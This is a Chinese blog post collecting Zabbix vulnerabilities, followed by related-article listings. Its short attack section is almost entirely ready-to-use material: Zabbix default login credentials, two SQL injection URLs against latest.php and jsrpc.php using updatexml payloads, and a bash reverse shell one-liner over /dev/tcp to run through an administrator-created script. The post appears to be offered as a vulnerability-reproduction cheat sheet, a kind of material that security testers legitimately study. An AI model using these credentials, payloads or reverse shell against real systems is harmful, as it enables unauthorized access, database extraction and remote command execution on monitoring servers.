zabbix 漏洞收集总结

最新推荐文章于 2024-05-23 18:42:52 发布
最新推荐文章于 2024-05-23 18:42:52 发布
阅读量2.6k 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: zabbix 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sojrs_sec/article/details/103782432
版权

一: 弱口令/默认账号

admin:zabbix
Admin:zabbix
guest: 空
在这里插入图片描述

二: sql注入(ave-2016-10134)

版本
2.2.x
3.3.0-3.03
1

http://192.168.239.24/latest.php?output=ajax&sid=bb3e723dc1a917a2&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,database()),0)
Sid要替换为zbx_session的后16位

2

http://ip:port/jsrpc.php?type=0&mode=1&method=screen.get&profileldx=web.item.graph&resourcetype=17 &profileldx2=updatexml(0,concat(0xa,database()),0)

三:系统命令执行

管理员登录
Administrator-script-createscript
bash -i >& /dev/tcp/ip/端口 0>&1

sojrs_sec
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现-zabbix系列
aming小老弟
01-09 5627
Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。该系统支持网络监控、服务器监控、云监控和应用监控等。能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix由2部分构成,zabbix server与可选组件zabbix agent。
Zabbix登录绕过漏洞复现(CVE-2022-23131)
zxcvbnmasdflzl的博客
09-11 814
最近在复现zabbix漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。
漏洞复现--Zabbix远程代码执行漏洞(CVE-2020-11800含EXP)
HengMengSec的博客
08-21 1996
漏洞复现--Zabbix远程代码执行漏洞(CVE-2020-11800含EXP)
震惊——某白帽破解zabbix系统,实现命令执行,最终获取shell
自强不息
05-19 1805
如果你坚持了自己的梦想,全世界都会为你让路。
zabbix从6.0.x升级到6.0.x
最新发布
u013930899的博客
05-23 1056
这两天安全方面暴露了zabbix的版本漏洞,具体漏洞信息如下:Zabbix Server Audit Log SQL 注入漏洞预警近日,某机构获取到Zabbix Server组件中修复了一个SQL注入漏洞(CVE-2024-22120),其CVSS评分为9.1,目前该漏洞的PoC已公开。
ZABBIX 2.4.8漏洞复现
Nuyoah的博客
06-08 572
利用poc测试是否存在漏洞,放到kali下执行,首先修改poc.py里的端口,主机名。进入后台之后点击 组态–>动作–>自动注册–>创建动作。查看ZAXXIB,host 注册成功。添加主机成功,开启了自动注册功能。跳转到这个页面,选择添加主机。修改目录,直接读出flag。随便取一个名称,点击添加。
【网络安全实战】某配送平台zabbix 未授权访问 + 弱口令
A1_3_9_7的博客
01-22 532
找到一个某src的子站,通过信息收集插件wappalyzer,发现ZABBIX-监控系统:使用谷歌搜索历史漏洞zabbix漏洞通过目录扫描扫描到后台,谷歌搜索一下有没有默认弱口令成功进去了,挖洞就是这么简单:搜索文章还爆过未授权访问漏洞,打一波又成功进去了,已经清除缓存在拼接路径的,进去成功寻找功能点,在搜索位置输入任何东西,前端页面就会显示什么,猜测可能存在反射xss,但没什么用,继续测试ssti注入不存在,这个站还可以getshell,但是点到为止。
Zabbix 远程代码执行漏洞(CVE-2020-11800)复现
锋刃科技的博客
01-14 5138
简介 Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 漏洞概述 Zabbix Server的trapper命令处理,存在命令注入漏洞,可导致远程代码执行。 影响版本 Zabbix 3.0.x~3.0.30 环境搭建 项目地址 https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2020-11800 ...
zabbix3.42
08-28
5. 数据收集Zabbix通过SNMP、IPMI、JMX、SSH、Telnet等多种方式收集数据,确保全面掌握系统状态。 6. API支持:Zabbix提供API接口,允许与其他系统集成,实现自动化运维。 二、Zabbix 3.4.12的改进与优化 1. ...
zabbix_agents_2.2.7.win.zip
06-29
总结Zabbix Agents 2.2.7 for Windows是一个强大且灵活的监控工具,通过理解bin和conf目录中的关键文件及其作用,我们可以更好地利用它来保障系统的稳定运行。无论是小型企业还是大型数据中心,Zabbix都能提供高效...
web漏洞挖掘经验.pdf
12-12
* 第三方通用组件漏洞:struts、thinkphp、jboss、ganglia、zabbix、cacti 等等。 10. 特殊服务类: * 未授权/命令执行类/漏洞1099、rmi、8000、jdwp、java 调试接口命令执行等。 Web 漏洞挖掘需要对目标进行...
安全列表:Penetrum LLC开源安全工具列表
02-03
2. **开源监测工具**:如`Nagios`和`Zabbix`,它们都是流行的系统和网络监控解决方案,可以实时监控服务器性能、网络设备状态,并在出现问题时发送警报。 3. **日志分析与安全事件响应**:`Logwatch`是一款自动化...
PerLOG-开源
05-01
Syslog是一种广泛使用的系统日志协议,用于收集和处理来自网络上不同设备的日志消息。PerLOG不仅能够接收和处理这些syslog消息,还引入了数据库后端存储和Web前端展示的功能,使其成为一个全面的日志管理和分析工具...
Zabbix漏洞
weixin_44237647的博客
11-20 1221
搜索方法:inurl:Zabbix/dashboard.php 漏洞说明: zabbix的某处存在报错注入,也可以使用sqlmap对报错点进行注入 报错点是profileIdx2= 发现用户名不是name字段,而是alias字段。与网上流传的exp的有所不同。 脚本参照前辈: 独自等待 https://www.waitalone.cn/ 更改为python3版本 import requests import os import sys import re def checkSql(): payloa
(CVE-2022-23131)Zabbix登录绕过漏洞复现
qq_17754023的博客
08-12 1982
Zabbix登录绕过漏洞复现(CVE-2022-23131)漏洞描述安全断言标记语言 (SAML) 是最常见的单点登录 (SSO) 标准之一。围绕 XML 实现,它允许身份提供者(IdP,一个能够对用户进行身份验证的实体)告诉服务提供者(SP,这里是 Zabbix)你是谁。您可以将Zabbix Web 前端配置为允许通过 SAML 进行用户身份验证,但默认情况下不启用它,因为它需要了解身份提供者的详细信息。这是企业部署最常见的设置。...
漏洞复现】CVE-2022-23131 Zabbix SAML SSO认证绕过漏洞
做自己喜欢的事,并将其发挥到极致!
02-25 5151
文章目录声明前言一、漏洞概述二、影响版本三、漏洞分析会话机制分析漏洞代码分析四、漏洞复现五、参考链接 声明 本篇文章仅用于技术学习和安全研究,切勿用于非授权下的测试行为,出现任何后果与本文章作者无关!!! 前言 Zabbix是全球流行的企业级开源监控解决方案。最近Zabbix官网爆出一则漏洞CVE-2022-23131 一、漏洞概述 Zabbix 是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的 CPU 负载和网络流量等指标。它与 Pandora FMS 和 Nagios 等解决
CVE-2022-23131 zabbix登录绕过漏洞
weixin_51339377的博客
04-09 4246
zabbix (可以实现网络 架构等服务的监控 基于C语言开发 通过web界面进行管理 php制作 lamp的环境) 高可用性 HA high available 最长业务中断时间 (1-90%)x365 (1-99%)x365 (1-99.9%)x365 .... 6个9的情况 也就是(1-99.9999%)x365 说明软件系统是具备优秀的高可用性 具体zabbix的部署方式可以见Linux运维处进行部署 zabbix部署完成登录后界面 利用...
zabbix最新漏洞,可绕过认证登陆!
笨办法学linux的博客
08-26 1669
Zabbix是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的CPU负载和网络流量等指标。式,导致在启动SAML SSO认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现RCE。...
ZABBIX相关总结.docx
06-27
"ZABBIX相关总结.docx" ZABBIX是一款开源的企业级监控解决方案,用于收集、聚合、处理、存储和展示IT基础设施的各种数据,包括网络性能、服务器状态、应用程序性能等。这份文档是对ZABBIX的全面总结,涵盖了从简介...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值